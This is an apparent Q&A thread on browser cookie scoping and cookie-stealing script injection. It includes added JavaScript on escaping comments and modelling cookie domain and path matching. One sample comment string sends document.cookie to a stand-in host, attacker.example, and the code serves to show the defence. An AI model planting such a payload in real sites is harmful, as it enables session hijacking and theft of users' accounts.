Say there is a site foo.com which loads JavaScript from site bar.com. Now, say the JavaScript from site bar.com tries to read cookies using document.cookies. I was under the impression that using JavaScript, you can read all the cookies set in the browser irrespective of their source. But it turns out that the JavaScript from the site bar.com can only access cookies set by bar.com and not any other. If this is the case, how are script injection attacks which steal cookies carried out?

A: 

They load scripts inside the attacked page.

For instance, when comments in a blog system get compromised, they contain a script element that is executed when the page is rendered. This script can get the cookies and send it to the attacker's server.

That's why you should never trust user input and disallow at least certain tags in comments (or translate every < to &lt;). But don't do this on the client side, as this prevention technique can easily be circumvented; test for (and change) malicious input on the server side.

Marcel Korpel
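The attack and the defence this answer describes, as an added example (not code from the original answer): a comment containing a script element that, when rendered unescaped into the blog's page, runs in the blog's origin and ships `document.cookie` to an attacker-controlled host, next to the server-side escaping that stops it. The comment text, the `attacker.example` host and the function names are constructed for illustration.

```javascript
// Added example: stored XSS through a blog comment, and server-side HTML escaping.
// Hostnames, comment text and function names are constructed for illustration.

// A comment an attacker submits. If the blog interpolates it into the page as-is,
// the browser runs the script in the blog's origin, so document.cookie here is the
// *blog's* cookie jar, not the attacker's.
const MALICIOUS_COMMENT =
  "Nice post! <script>new Image().src='https://attacker.example/c?' +" +
  "encodeURIComponent(document.cookie)</script>";

// Vulnerable renderer: user input is dropped straight into the markup.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Escape the characters that can change HTML structure or break out of an
// attribute value. Done with one regex and a lookup table so ordering of the
// replacements cannot re-introduce an unescaped '&'.
function escapeHtml(s) {
  const table = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => table[ch]);
}

// Hardened renderer: escaping happens on the server before the HTML is sent,
// so a client that skips or disables the check gains nothing.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Crude check used only to demonstrate the difference between the two renderers.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

module.exports = { MALICIOUS_COMMENT, renderCommentUnsafe, renderCommentSafe, escapeHtml, containsScriptTag };
```

Escaping on output is the general fix the answer calls for; a whitelist of allowed tags is a narrower alternative and needs a real HTML parser, not regexes. Independently, marking the session cookie `HttpOnly` (mentioned further down this page) keeps it out of `document.cookie` altogether, which limits what such an injected script can steal even if escaping is missed somewhere.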
+2  A: 

But it turns out that the JavaScript from the site bar.com can only access cookies set by bar.com and not any other.

That isn't true. What matters is where the HTML document containing the <script> element is, not the URL of the JS file that said <script> mentions in the src attribute.

I suspect your problem is that you are accessing document.cookies when the property is called document.cookie (Singular!)

David Dorward
That's also how CDNs work, like the jQuery script that is loaded on this site: `http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js` doesn't live on domain `stackoverflow.com`.
Marcel Korpel
@David, cookie thing was a spelling mistake while typing the question. I just now tried with alert(document.cookie) and I just get a blank string in spite of cookies being set. I am pretty baffled.
roger
I performed a test. The domain makes no difference. Perhaps the cookies you are trying to fetch are on a different path, or set to be HTTP only.
David Dorward
Cookie is not HTTP only. Site foo.com contains script from site moo.bar.com and the cookie is set with domain bar.com (not moo.bar.com) with the path being /. This is the scenario I am testing and I am not able to read the cookies.
roger
Then that is the problem. The script is running on foo.com so it can't read the cookie from bar.com — exactly as my answer said.
David Dorward
Err? Yes. It is a bar.com cookie, it gets included in all requests to bar.com, including subdomains. You can't read it with a script where the script element is in an HTML document on foo.com.
David Dorward
Oops. Got it. In cookie stealing it is the other way round. Script from bar.com residing in foo.com tries to read cookies from foo.com itself and not from bar.com. Thanks. Plugged the hole in my understanding.
roger
A: 

You can only access cookies which have been set for the given domain name. From the Wikipedia article on cookies:

Beside the name/value pair, a cookie may also contain an expiration date, a path, a domain name, and whether the cookie is intended only for encrypted connections. RFC 2965 mandates cookies have a version number, but this is usually omitted. These pieces of data follow the name=newvalue pair and are separated by semicolons. For example, a cookie can be created by the server by sending a line Set-Cookie: name=newvalue; expires=date; path=/; domain=.example.org.

The domain and path tell the browser that the cookie has to be sent back to the server when requesting URLs of a given domain and path. If not specified, they default to the domain and path of the object that was requested. As a result, the domain and path strings may tell the browser to send the cookie when it normally would not. For security reasons, the cookie is accepted only if the server is a member of the domain specified by the domain string.

If foo.com sent a cookie which had the domain name of bar.com, or even .com, then JavaScript code on bar.com could read that cookie. However most browsers are configured to only accept cookies when the domain name matches, and would reject such a cookie.

Josh
I verified that the cookie is present but JavaScript is not able to read it.
roger
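The rule David's answer and the comment thread arrive at (the document's host and path decide what `document.cookie` returns, the script's `src` host does not), together with the domain and path matching and the "server must be a member of the domain" acceptance check quoted in Josh's answer, as an added example that is not part of the original thread. It models a browser cookie jar and the RFC 6265 matching rules; the hostnames, cookie names and values are constructed for illustration, and the public-suffix check is a deliberately crude approximation.

```javascript
// Added example (not from the original thread): which cookies a document.cookie
// read returns, following RFC 6265 domain/path matching. Hosts, cookie names and
// values below are constructed for illustration.

// A cookie jar as a browser might hold it. `domain` is the Domain attribute the
// server sent with the leading dot removed (browsers normalise it that way);
// `hostOnly` is true when no Domain attribute was sent, so only the exact host
// that set the cookie matches.
const JAR = [
  { name: "sid",   value: "abc123", domain: "bar.com",     hostOnly: false, path: "/",    httpOnly: false },
  { name: "admin", value: "x",      domain: "moo.bar.com", hostOnly: true,  path: "/",    httpOnly: false },
  { name: "sess",  value: "s3cr3t", domain: "foo.com",     hostOnly: false, path: "/",    httpOnly: true  },
  { name: "pref",  value: "dark",   domain: "foo.com",     hostOnly: false, path: "/app", httpOnly: false },
];

// RFC 6265 domain-matching: host equals the domain, or ends with "." + domain.
function domainMatches(host, domain) {
  return host === domain || host.endsWith("." + domain);
}

// RFC 6265 path-matching: equal, or the cookie path is a prefix that ends at a "/".
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || requestPath[cookiePath.length] === "/";
}

// What document.cookie evaluates to for a document served from docHost/docPath.
// Note that nothing here looks at where the <script> was loaded from: a script
// from moo.bar.com embedded in a foo.com page sees foo.com's cookies.
function documentCookie(jar, docHost, docPath) {
  return jar
    .filter((c) => !c.httpOnly)                                   // HttpOnly is never exposed to script
    .filter((c) => (c.hostOnly ? docHost === c.domain : domainMatches(docHost, c.domain)))
    .filter((c) => pathMatches(docPath, c.path))
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Whether a browser accepts a Set-Cookie carrying the given Domain attribute
// from the host that sent the response (Josh's point: foo.com cannot plant a
// cookie scoped to bar.com or to ".com").
function acceptsDomainAttribute(responseHost, domainAttr) {
  const d = domainAttr.replace(/^\./, "").toLowerCase();
  // Real browsers consult the Public Suffix List; requiring at least one dot is
  // a crude stand-in that rejects bare TLDs such as "com".
  if (!d.includes(".")) return false;
  return domainMatches(responseHost.toLowerCase(), d);
}

module.exports = { JAR, domainMatches, pathMatches, documentCookie, acceptsDomainAttribute };
```

Run against the jar above, `documentCookie(JAR, "foo.com", "/")` is the empty string that roger observed: the `bar.com` cookie is not domain-matched by `foo.com`, `sess` is HttpOnly and `pref` is scoped to `/app`. The same jar read from a `moo.bar.com` document yields `sid=abc123; admin=x`. Real browsers additionally order the returned pairs (longer paths first, then by creation time); this model keeps jar order.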